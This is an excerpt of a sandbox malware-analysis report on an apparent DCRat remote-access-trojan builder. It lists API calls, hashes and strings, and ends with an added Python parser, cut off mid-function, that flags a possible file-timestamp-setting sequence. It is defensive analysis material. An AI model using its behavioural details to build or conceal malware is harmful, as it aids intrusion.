                                                                                                                        • Instruction Fuzzy Hash: 8B11C2329001147AEF219E659C49FBF3B6CEB2A711F000067FA45E2181C7A8995587A9
                                                                                                                        APIs
                                                                                                                        • LoadBitmapW.USER32(00000065), ref: 004AB6ED
                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 004AB712
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004AB744
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004AB767
                                                                                                                          • Part of subcall function 004AA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,004AB73D,00000066), ref: 004AA6D5
                                                                                                                          • Part of subcall function 004AA6C2: SizeofResource.KERNEL32(00000000,?,?,?,004AB73D,00000066), ref: 004AA6EC
                                                                                                                          • Part of subcall function 004AA6C2: LoadResource.KERNEL32(00000000,?,?,?,004AB73D,00000066), ref: 004AA703
                                                                                                                          • Part of subcall function 004AA6C2: LockResource.KERNEL32(00000000,?,?,?,004AB73D,00000066), ref: 004AA712
                                                                                                                          • Part of subcall function 004AA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,004AB73D,00000066), ref: 004AA72D
                                                                                                                          • Part of subcall function 004AA6C2: GlobalLock.KERNEL32(00000000), ref: 004AA73E
                                                                                                                          • Part of subcall function 004AA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 004AA762
                                                                                                                          • Part of subcall function 004AA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 004AA7A7
                                                                                                                          • Part of subcall function 004AA6C2: GlobalUnlock.KERNEL32(00000000), ref: 004AA7C6
                                                                                                                          • Part of subcall function 004AA6C2: GlobalFree.KERNEL32(00000000), ref: 004AA7CD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                        • String ID: ]
                                                                                                                        • API String ID: 1797374341-3352871620
                                                                                                                        • Opcode ID: 8951b234e36af5e5c527f06b58de6241c3d24aa9161a405b3731439a96f3ebd3
                                                                                                                        • Instruction ID: 55ebd56465e5bad516eadc04d8e41ff0409b86fac44112e933b387d7d6023c8c
                                                                                                                        • Opcode Fuzzy Hash: 8951b234e36af5e5c527f06b58de6241c3d24aa9161a405b3731439a96f3ebd3
                                                                                                                        • Instruction Fuzzy Hash: FD01043A9001016BD7127B749C09A7F7AB9DFD2B56F04002BF900A7396DF698D2586A9
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00491316: GetDlgItem.USER32(00000000,00003021), ref: 0049135A
                                                                                                                          • Part of subcall function 00491316: SetWindowTextW.USER32(00000000,004C35F4), ref: 00491370
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 004AD64B
                                                                                                                        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 004AD661
                                                                                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 004AD675
                                                                                                                        • SetDlgItemTextW.USER32(?,00000068), ref: 004AD684
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemText$DialogWindow
                                                                                                                        • String ID: RENAMEDLG
                                                                                                                        • API String ID: 445417207-3299779563
                                                                                                                        • Opcode ID: a3bb297fe697ec6448ced0ba5d22f26e285615624f5dd27da924088ebcd07b11
                                                                                                                        • Instruction ID: 4b8699fd8ff3da2c54d278bc8b739ecd1e5b282e7a006b0230907182bc8acd02
                                                                                                                        • Opcode Fuzzy Hash: a3bb297fe697ec6448ced0ba5d22f26e285615624f5dd27da924088ebcd07b11
                                                                                                                        • Instruction Fuzzy Hash: 90012833A44210BAD2104F649E09F6B7B5CFB7BB02F214433F306A65D1C6AA9A15C77E
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004B7E24,00000000,?,004B7DC4,00000000,004CC300,0000000C,004B7F1B,00000000,00000002), ref: 004B7E93
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004B7EA6
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,004B7E24,00000000,?,004B7DC4,00000000,004CC300,0000000C,004B7F1B,00000000,00000002), ref: 004B7EC9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                        • Opcode ID: 62d22792f43562a57d86ea1594da04026232fda2899b67e8a0c9a09240d70e35
                                                                                                                        • Instruction ID: d65f153edc481f58c4607b22dfbaeff26e5eea2d2c51364b0080b7c013d35d8d
                                                                                                                        • Opcode Fuzzy Hash: 62d22792f43562a57d86ea1594da04026232fda2899b67e8a0c9a09240d70e35
                                                                                                                        • Instruction Fuzzy Hash: 7AF06835900208BBCB559FA5DC09FDEBFB4EF44716F0181BAF805A6250DB359E44CAAC
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004A081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004A0836
                                                                                                                          • Part of subcall function 004A081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0049F2D8,Crypt32.dll,00000000,0049F35C,?,?,0049F33E,?,?,?), ref: 004A0858
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0049F2E4
                                                                                                                        • GetProcAddress.KERNEL32(004D81C8,CryptUnprotectMemory), ref: 0049F2F4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                        • API String ID: 2141747552-1753850145
                                                                                                                        • Opcode ID: e202a3d9f2bd55d7792b6f9e5cd06c0b5ea6b65be6b04c39309b865d2357e03a
                                                                                                                        • Instruction ID: be7885397e1cf92f13613131a12afa4209fb5df84f642c9dc3804e74445d0136
                                                                                                                        • Opcode Fuzzy Hash: e202a3d9f2bd55d7792b6f9e5cd06c0b5ea6b65be6b04c39309b865d2357e03a
                                                                                                                        • Instruction Fuzzy Hash: ABE0DF358007019ECB609F369808F427ED46F05709B24C83FE0CAD3240C6BED0408B08
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustPointer$_abort
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2252061734-0
                                                                                                                        • Opcode ID: 04104c6ddfb285d6fef5acada20e2462f035d7b302eea4576f1d3583819604be
                                                                                                                        • Instruction ID: 82e22aacd447f28cf2ebf9bb115e7997b9397254ae130bbfc2a12d09937d962c
                                                                                                                        • Opcode Fuzzy Hash: 04104c6ddfb285d6fef5acada20e2462f035d7b302eea4576f1d3583819604be
                                                                                                                        • Instruction Fuzzy Hash: 0151ED72600202AFDB288F15DA45BEB77B8FF14301F24452FE805572A1D7B9ED51D7A8
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 004BBF39
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004BBF5C
  • Part of subcall function 004B8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004BCA2C,00000000,?,004B6CBE,?,00000008,?,004B91E0,?,?,?), ref: 004B8E38
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004BBF82
• _free.LIBCMT ref: 004BBF95
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004BBFA4
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
APIs
• GetLastError.KERNEL32(?,?,?,004B91AD,004BB188,?,004B9813,00000001,00000364,?,004B3F73,00000050,?,004D1030,00000200), ref: 004B986E
• _free.LIBCMT ref: 004B98A3
• _free.LIBCMT ref: 004B98CA
• SetLastError.KERNEL32(00000000,?,004D1030,00000200), ref: 004B98D7
• SetLastError.KERNEL32(00000000,?,004D1030,00000200), ref: 004B98E0
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
APIs
  • Part of subcall function 004A11CF: ResetEvent.KERNEL32(?), ref: 004A11E1
  • Part of subcall function 004A11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 004A11F5
• ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 004A0F21
• CloseHandle.KERNEL32(?,?), ref: 004A0F3B
• DeleteCriticalSection.KERNEL32(?), ref: 004A0F54
• CloseHandle.KERNEL32(?), ref: 004A0F60
• CloseHandle.KERNEL32(?), ref: 004A0F6C
  • Part of subcall function 004A0FE4: WaitForSingleObject.KERNEL32(?,000000FF,004A1206,?), ref: 004A0FEA
  • Part of subcall function 004A0FE4: GetLastError.KERNEL32(?), ref: 004A0FF6
Similarity
• API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
• String ID:
• API String ID: 1868215902-0
APIs
• _free.LIBCMT ref: 004BC817
  • Part of subcall function 004B8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?), ref: 004B8DE2
  • Part of subcall function 004B8DCC: GetLastError.KERNEL32(?,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?,?), ref: 004B8DF4
• _free.LIBCMT ref: 004BC829
• _free.LIBCMT ref: 004BC83B
• _free.LIBCMT ref: 004BC84D
• _free.LIBCMT ref: 004BC85F
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• _wcslen.LIBCMT ref: 004A1FE5
• _wcslen.LIBCMT ref: 004A1FF6
• _wcslen.LIBCMT ref: 004A2006
• _wcslen.LIBCMT ref: 004A2014
• CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0049B371,?,?,00000000,?,?,?), ref: 004A202F
Similarity
• API ID: _wcslen$CompareString
• String ID:
• API String ID: 3397213944-0
APIs
Strings
Similarity
• API ID: _swprintf
• String ID: %ls$%s: %s
• API String ID: 589789837-2259941744
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\DCRatBuild.exe,00000104), ref: 004B7FAE
• _free.LIBCMT ref: 004B8079
• _free.LIBCMT ref: 004B8083
Strings
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
• API String ID: 2506810119-119056061
APIs
• EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004B31FB
• _abort.LIBCMT ref: 004B3306
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: EncodePointer_abort
• String ID: MOC$RCC
APIs
• __EH_prolog.LIBCMT ref: 00497406
  • Part of subcall function 00493BBA: __EH_prolog.LIBCMT ref: 00493BBF
• GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 004974CD
  • Part of subcall function 00497A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00497AAB
  • Part of subcall function 00497A9C: GetLastError.KERNEL32 ref: 00497AF1
  • Part of subcall function 00497A9C: CloseHandle.KERNEL32(?), ref: 00497B00
Strings
Similarity
• API ID: ErrorH_prologLast$CloseCurrentHandleProcess
• String ID: SeRestorePrivilege$SeSecurityPrivilege
APIs
  • Part of subcall function 00491316: GetDlgItem.USER32(00000000,00003021), ref: 0049135A
  • Part of subcall function 00491316: SetWindowTextW.USER32(00000000,004C35F4), ref: 00491370
• EndDialog.USER32(?,00000001), ref: 004AAD98
• GetDlgItemTextW.USER32(?,00000066,?,?), ref: 004AADAD
• SetDlgItemTextW.USER32(?,00000066,?), ref: 004AADC2
Strings
Similarity
• API ID: ItemText$DialogWindow
• String ID: ASKNEXTVOL
APIs
• DialogBoxParamW.USER32(GETPASSWORD1,00010422,004AB270,?,?), ref: 004ADE18
Strings
Similarity
• API ID: DialogParam
• String ID: GETPASSWORD1$rJ$xzN
APIs
• __fprintf_l.LIBCMT ref: 0049D954
• _strncpy.LIBCMT ref: 0049D99A
  • Part of subcall function 004A1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,004D1030,00000200,0049D928,00000000,?,00000050,004D1030), ref: 004A1DC4
Strings
Similarity
• API ID: ByteCharMultiWide__fprintf_l_strncpy
• String ID: $%s$@%s
APIs
• InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0049AC5A,00000008,?,00000000,?,0049D22D,?,00000000), ref: 004A0E85
• CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0049AC5A,00000008,?,00000000,?,0049D22D,?,00000000), ref: 004A0E8F
• CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0049AC5A,00000008,?,00000000,?,0049D22D,?,00000000), ref: 004A0E9F
Strings
• Thread pool initialization failed., xrefs: 004A0EB7
Similarity
• API ID: Create$CriticalEventInitializeSectionSemaphore
• String ID: Thread pool initialization failed.
APIs
Strings
Similarity
• API ID: Malloc
• String ID: (J$2J$A
Strings
Similarity
• API ID:
• String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0049E2E8: _swprintf.LIBCMT ref: 0049E30E
                                                                                                                          • Part of subcall function 0049E2E8: _strlen.LIBCMT ref: 0049E32F
                                                                                                                          • Part of subcall function 0049E2E8: SetDlgItemTextW.USER32(?,004CE274,?), ref: 0049E38F
                                                                                                                          • Part of subcall function 0049E2E8: GetWindowRect.USER32(?,?), ref: 0049E3C9
                                                                                                                          • Part of subcall function 0049E2E8: GetClientRect.USER32(?,?), ref: 0049E3D5
                                                                                                                        • GetDlgItem.USER32(00000000,00003021), ref: 0049135A
                                                                                                                        • SetWindowTextW.USER32(00000000,004C35F4), ref: 00491370
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                        • String ID: J$0
                                                                                                                        • API String ID: 2622349952-163445241
                                                                                                                        • Opcode ID: d333e29e8ce844b5acaf32526467dd4df979d24750f9a2a6c1f6b9d487ad3554
                                                                                                                        • Instruction ID: 9ca74078a3852aed00dce0bfd0fd9d7b36f62059798ef6da6bdfdba71184bcef
                                                                                                                        • Opcode Fuzzy Hash: d333e29e8ce844b5acaf32526467dd4df979d24750f9a2a6c1f6b9d487ad3554
                                                                                                                        • Instruction Fuzzy Hash: 27F03130104289B6EF255F51880DBAA3F79AB44345F0481BAFC4455AB1CB7CC990DA58
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1036877536-0
                                                                                                                        • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                        • Instruction ID: b1f6c87a6e8c54849c1ae3835cfa75d6624dc5fcd3c907931274aaf3451facfe
                                                                                                                        • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                        • Instruction Fuzzy Hash: 50A13672A042869FEB158F29C8917EABFF5EF55310F18416FE6459B381C23C9D42C768
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00497F69,?,?,?), ref: 0049A3FA
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00497F69,?), ref: 0049A43E
                                                                                                                        • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00497F69,?,?,?,?,?,?,?), ref: 0049A4BF
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000800,?,00497F69,?,?,?,?,?,?,?,?,?,?), ref: 0049A4C6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Create$CloseHandleTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2287278272-0
                                                                                                                        • Opcode ID: c5b38de2eae29361014085dbc49587606128b579cdc19bff02967cd008fc7e04
                                                                                                                        • Instruction ID: 7adcb12c0a11976fa5753368dbb36fcfa2e4bff8b1bf881a2ea5c03b5a4823d0
                                                                                                                        • Opcode Fuzzy Hash: c5b38de2eae29361014085dbc49587606128b579cdc19bff02967cd008fc7e04
                                                                                                                        • Instruction Fuzzy Hash: 9C41E3311483819AEB31DF24DC49FAFBBE49B85304F14092EB9D1D3290D6A89A58DB97
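The CreateFileW / SetFileTime / CloseHandle routine at 0049A3FA..0049A4C6 is the one record in this listing with a directly forensics-relevant API sequence, so here is an added example (not part of the Joe Sandbox report, and not the sample's code) that parses the report's "API.MODULE(args), ref: addr" call lines, names the CreateFileW argument constants with the standard Win32 values, and flags the write-open, set-time, close pattern. The input is the four lines from the record above, embedded as a constructed string; the sandbox prints stack slots beyond the real parameters, so only the first seven CreateFileW arguments are decoded.

```python
import re
from typing import Dict, List, NamedTuple, Optional

# Constructed input: the four call lines this report lists for the routine at
# 0049A3FA..0049A4C6, copied from the page (Joe Sandbox "API.MODULE(args), ref: addr" format).
REPORT_LINES = """\
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00497F69,?,?,?), ref: 0049A3FA
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00497F69,?), ref: 0049A43E
• SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00497F69,?,?,?,?,?,?,?), ref: 0049A4BF
• CloseHandle.KERNEL32(?,?,?,00000800,?,00497F69,?,?,?,?,?,?,?,?,?,?), ref: 0049A4C6
"""

# Standard Win32 constants for the CreateFileW parameters decoded below.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS_ATTRS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
               0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN", 0x80000000: "FILE_FLAG_WRITE_THROUGH",
               0x00000080: "FILE_ATTRIBUTE_NORMAL", 0x00000002: "FILE_ATTRIBUTE_HIDDEN"}

LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


class Call(NamedTuple):
    api: str
    module: str
    args: List[Optional[int]]  # None where the report prints '?' (value not recovered)
    ref: int                   # address of the call instruction


def parse_calls(text: str) -> List[Call]:
    """Parse call lines; entries without an argument list (e.g. '_swprintf.LIBCMT ref: ...') are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [None if a.strip() == "?" else int(a, 16) for a in m["args"].split(",")]
        calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16)))
    return calls


def decode_mask(value: int, table: Dict[int, str]) -> str:
    """Render a bit mask as 'NAME|NAME', keeping unknown bits as a hex remainder."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = 0
    for bit in table:
        known |= bit
    leftover = value & ~known & 0xFFFFFFFF
    if leftover:
        names.append(f"0x{leftover:08X}")
    return "|".join(names) if names else "0"


def decode_createfile(call: Call) -> Dict[str, str]:
    """Name dwDesiredAccess, dwShareMode, dwCreationDisposition and dwFlagsAndAttributes of a CreateFile call."""
    if call.api not in ("CreateFileW", "CreateFileA") or len(call.args) < 7:
        raise ValueError("not a complete CreateFile call")
    access, share, disp, flags = call.args[1], call.args[2], call.args[4], call.args[5]
    return {
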